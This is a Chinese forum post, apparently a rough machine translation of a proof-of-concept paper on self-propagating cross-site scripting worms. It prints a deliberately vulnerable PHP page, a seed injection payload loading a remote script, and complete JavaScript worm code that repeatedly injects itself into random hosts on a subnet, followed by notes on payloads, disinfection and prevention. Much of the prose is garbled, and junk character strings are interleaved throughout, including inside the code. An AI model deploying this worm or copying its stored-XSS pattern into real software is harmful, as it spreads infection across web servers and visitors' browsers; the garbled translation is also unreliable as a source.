跨站(xss)脚本病毒编写详解 (HaCkXi译文)2009-02-23 08:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。
' l" b& g0 p; M5 q- L& z7 T7 h2 y7 V% U: {# v: A- H8 k) Z
最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染的网页浏览器连接到随机地点和执行利用获得的要求。注入代码,从而进一步易受感染的Web应用与自我繁殖的代码。
; O1 _3 P% K5 E: t5 L# P5 {
' R, l6 E, f& T8 Y& J- U3 N5 i! l下面制作的永久性的XSS利用PHP页面可以感染病毒。该网页接受一个参数(参数)值,并写入到一个文件( file.txt ) 。这个档案,然后返回请求的浏览器。该文件将包含以前的值的“参数”参数。如果没有参数是通过它会显示该文件没有更新。4 _/ T; V* P% V3 X! R3 ?
* |4 P1 K* w0 [3 q: F
Web应用程序:index.php
' X8 x4 r( T( W" E/ P$ e
, A0 p8 w2 f6 V( w+ A5 m: wQUOTE:<?php
1 L- o! a9 e' L) n2 ] $p=$HTTP_GET_VARS['param'];
3 e9 S/ n: z# Z3 D $filename = "./file.txt";
$ `8 {( k0 J6 a/ x6 ~0 M1 J# ?$ W( @
if ($p != "") {
# ^" Z* Y9 W% v. X5 D+ E$handle=fopen($filename, "wb");
: f4 O; D4 P V& t D$ ^1 V% hfputs($handle, $p);
% ?7 C. D, `1 S( o- m/ v8 dfclose($handle);
) R# x5 [& N7 R3 k, V3 d. D } z# n& t/ Q r( z. L7 z
6 A2 I7 g, y1 P' e( x+ O $handle = fopen($filename, "r");
- j5 p5 ^" t4 M$ q8 t' H8 s $contents = fread($handle, filesize($filename));
* ^7 d0 S5 C9 U' W- `- V% e fclose($handle);
2 c" W! P1 W3 q. P5 Q
/ }, y: j. z& G: `) K5 x$ s/ B print $contents;
l6 z3 Y8 o6 A P9 c$ u2 Q$ s3 L3 |' b?>- K. {7 J1 o- a
6 k) ]# o. S S3 b& w; [此网页的index.php 主办的多个虚拟服务器在10.0.0.0/24子网。一个网络应用实例种子,然后用以下代码检索javascript文件并执行它。另外,有可能注入到整个代码的脆弱的应用,而不是要求javascript文件。为了简洁明了, JavaScript文件(xssv.jsp)要求。# S3 N8 `9 @6 s' X, _$ U* b
1 L4 i- l: j. X8 u) U
注入种子编号:; o4 r2 u" J$ L1 V ?6 C% o
- Z" F7 W3 M! ]. m2 L. e8 XQUOTE:<iframe name="iframex" id="iframex" src="hidden" style="display:none">
! C3 Y/ a* D5 D3 |( h. z</iframe>
* W5 Q% t; F+ }5 b<script SRC="http://<webserver>/xssv.js"></script>
! {& g4 Z* F9 S% E- l2 u. |5 T. D. b+ X# }0 w
在javascript文件所要求的例子如下所示。其自我用途繁殖的iframe是定期重新使用loadIframe ()函数。目标网站的IP地址的iframe是随机挑选的10.0.0.0/24子网的功能通过get_random_ip()。该病毒使用的XSS相结合的这两项职能,并不断定期调用使用setInterval()函数。$ E, s7 D5 Z, T
. D6 j! B1 N9 P$ e9 tJavascipt : xssv.jsp1 l; C; p' T5 L- _2 q( j
- m: c+ ~% `) [7 i, G6 L7 J8 F
QUOTE:function loadIframe(iframeName, url) { % A3 g4 C) Q# ]
if ( window.frames[iframeName] ) {
' l6 `7 K1 | w% Mwindow.frames[iframeName].location = url;
' b! w9 H9 v3 M# y$ H& v6 oreturn false;
9 h/ ?" m) Q8 c7 p }
: F2 s& I- P+ Y8 v1 a9 W1 E else return true; / w+ P. @+ z% ~1 K1 {+ n
}
. g3 |- i" z% y7 ?' H* K& z4 Y6 L, n2 M/ |2 C7 z W
function do_request() {
5 j3 ?5 l) D: X; m* F var ip = get_random_ip();
! G, I2 r S R( }" u) b& ] var exploit_string = '<iframe name="iframe2" id="iframe2" ' + 9 e) R1 z. }6 E
'src="hidden" style="display:none"></iframe> ' +
+ V2 P% k/ w+ J$ l'<script SRC="http://<webserver>/xssv.js"></script>';
& j" E# y0 |( C, c* h5 x6 p: v
* B A! C n/ V8 T1 A loadIframe('iframe2',
! y9 ?5 H& |" p7 K' i"http://" + ip + "/index.php?param=" + exploit_string); . `: }! ^( l- B3 O0 I2 d, x
}
& p) }0 b/ [) ~% F7 I' P" g( Y* o% g" \& [: ~
function get_random() , f9 p$ y) g* }0 j$ \
{
) O0 e/ Q g H3 J+ A var ranNum= Math.round(Math.random()*255);
. k% I2 w6 g9 x5 ^ return ranNum;
; U# G n2 c: _) G" n K+ Y6 P}
& Z/ F" p0 @ U+ v3 a! q
) U8 v1 G: n1 ^3 jfunction get_random_ip() $ m% F0 s- V! K$ s" I1 r" k$ y9 D
{ & t* ?. ?* r: E6 H$ q1 N
return "10.0.0."+get_random();
6 r6 p0 a' V) S- m2 h} 7 X4 z; e- t2 R" e/ _$ `& a' _8 i3 Y
+ E0 g/ t' J$ t' PsetInterval("do_request()", 10000);
- h9 |- G4 u* t" l. x0 y: Y& X q2 _9 u9 O" p* F
看种子Web应用的浏览器造成感染其他网络应用的10.0.0.0/24子网。这种感染,一直持续到一些,但并非所有的应用受到感染。在这一点上的浏览器是手动停止。另一个浏览器,然后用来查看一个新感染的Web应用。该病毒然后继续感染,其余未web应用程序的子网内。
V$ x2 {! @/ ?+ w4 b# Q: p1 \3 i. I5 Y. H$ }3 O# z* K) E ^0 M$ N0 C) _
这个概念证明表明,控制的条件下,没有什么不同,以一个真实的世界环境中,跨站脚本病毒可以自我繁殖和传染。
* ]: g3 {" c( H: u) p8 |: i; n$ q9 v8 m8 G3 {' _
常规病毒分歧/ A, C" B: b2 E" l! i
5 P* I7 A, |, I: H% Y, m5 b s常规病毒和执行居住在同一系统上。单独的XSS病毒的这两个要求的一种共生关系,服务器和浏览器。执行发生在客户端浏览器的代码,并驻留在服务器上。
* u% G8 E( V- \) j0 k3 z3 \- u' H5 F' _8 y) Q
纲要indiscrimination还分成一的XSS病毒从传统的对应。这是因为封装在HTML和HTTP / HTTPS协议。这些标准是支持大部分网络浏览器上运行不同的操作系统,使得跨站点脚本病毒平台独立。这个平台的独立性增加了一些潜在的网络应用,可感染。 , D8 N! L- q+ \
感染
8 {1 `( Z- C# q# O! t: v/ f
7 k1 Z! M, o1 _$ k) b7 N& _( P6 N跨站点脚本病毒感染发生在两个阶段,通常至少有两个设备。因此,有两种感染工作共生。
9 L; B$ O) C- s y9 e! x m: a
Y; {& q" `7 ~ D% J, G3 {服务器感染了持续自我传播的代码,它没有执行。第二阶段是浏览器的感染。注入代码加载从网站到非持久性的网络浏览器和处决。执行然后寻求新的服务器/网页加以利用并有可能执行它的有效载荷。通常情况下,将有一个受感染的服务器,许多受感染的浏览器。 8 H4 Q! k. z# ]$ D
有效载荷
* @3 l' M* S' H0 b6 u$ s
( W+ o0 C3 f- m# T常规病毒一样,病毒的XSS能够提供有效载荷。该有效载荷将被处死的浏览器,并有限制的HTML兼容的代码。也就是说,有效载荷可以执行的HTML功能,包括了JavaScript 。
: C/ k3 Z4 c# n, O2 x* h, D: ^- l+ b/ g$ q+ e* Y5 \9 s
虽然这并不构成限制,跨站脚本病毒仍然能够恶意活动。例如,可以有效载荷提供DDOS攻击,显示垃圾邮件或包含浏览器的漏洞。未来的载荷能力很可能是更大的原因越来越多的浏览器老练。 & k# T4 `6 X: Y. s6 @ U
消毒
; r7 T4 `1 c. i7 l# C, Z
0 F- t( ]& E( A之间的关系,服务器和一个浏览器可以被打破,只需关闭浏览器。但是,目前还没有手段来防止浏览器再次感染以外的其他禁用浏览器的功能。2 m c: S) L* ?& g7 A# M: z
" t8 S1 N' z8 m" l8 U
潜在的消毒方法将涉及引荐外地的请求标头。这是由于这一事实,即引荐很可能是登录网络服务器那里感染了尝试。因此,如果引荐欺骗并没有发生后,日志文件将揭示线索回到来源的病毒。; C( M' _; U, V" P
2 s! x" t& w/ b& S& Z) N' U' g预防8 {* n- W. a( ^/ d- _7 B
. @3 n p7 N: y/ K& V
一个共同的初期,以预防病毒感染是一个网络级防火墙。正如的HTTP / HTTPS协议是提供不受限制地通过共同的防火墙配置,这些防火墙障碍是无效的。一个潜在的补救措施,这是一个应用防火墙适当的XSS病毒签名。虽然不太可能,最明显的方式,以防止病毒的XSS是消除了XSS漏洞的Web应用。
% t* I. A+ m8 A% e- {% Q
" C' X3 m1 j; c8 l, @. U% H( C. i结论: x' S6 }& h$ O/ y" S
$ R' Z# O$ H8 b
传染病性质的XSS病毒已被证明在一个受控环境。它是通过故意制作脆弱的网络应用程序分布在子网。这个环境,后来受到感染。0 n# n$ l- q* t& v$ j
5 x' U7 T8 {5 X) r+ w9 s的XSS病毒是一种新的物种。他们区分自己从他们的表兄弟通过常规的要求一台服务器的客户共生的关系和它们的平台独立性。这些差异产生积极和消极影响,毒的感染。
* X* e5 [* s9 S! G! O( v, X: l! k& D0 K+ s0 a! V
本文说明了XSS病毒是平台独立的,并能进行恶意的职能。虽然有减缓的因素,这些问题再加上日益复杂的网络浏览器显示的XSS威胁的病毒。主动必须采取措施,以打击这一威胁,病毒之前的XSS成为流行病。* S% m$ b- r+ ~0 d0 |' s. C
7 O8 [) z6 \/ a( O/ c# ] 翻译者: HaCkXi : e2 q# @5 T/ }/ J& ~0 H
Blog: www.hackxi.cn
2 R+ Y5 T( T1 d( o; z; g3 H. A4 S 提供者:ShadowHider
. T) H6 l0 D8 |. F. a7 d3 p% N Blog: http://hi.baidu.com/zrxc
/ ^. L( k5 Q. I7 ^$ V
& m* L( M6 Y3 D) h) D! [ |